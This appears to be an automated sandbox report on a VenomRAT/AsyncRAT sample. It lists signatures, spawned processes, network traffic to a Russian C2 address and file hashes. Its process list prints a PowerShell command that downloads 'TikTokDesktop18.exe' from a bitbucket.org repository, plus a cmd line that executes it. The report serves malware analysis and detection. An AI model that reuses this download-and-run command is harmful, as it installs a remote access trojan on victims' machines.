Analysis Overview
SHA256
b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8
Threat Level: Known bad
The file b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe was found to be: Known bad.
Malicious Activity Summary
Venomrat family
VenomRAT
Asyncrat family
AsyncRat
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-27 12:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-27 12:32
Reported
2024-11-27 12:34
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-27 12:32
Reported
2024-11-27 12:34
Platform
win10v2004-20241007-en
Max time kernel
102s
Max time network
118s
Command Line
Signatures
AsyncRat
Asyncrat family
VenomRAT
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4636 set thread context of 3136 | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.168.33:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.168.231.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csk0b3eh.uwp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
| MD5 | e619fff5751a713cf445da24a7a12c94 |
| SHA1 | 9fc67a572c69158541aaaab0264607ada70a408c |
| SHA256 | 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9 |
| SHA512 | 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae |
C:\Users\Admin\AppData\Roaming\gdi32.dll
| MD5 | 8d662564d514751028c65d96c696271f |
| SHA1 | 8e27943b7b901a808d39a7ee6977e1d3769a15fb |
| SHA256 | 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b |
| SHA512 | 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef |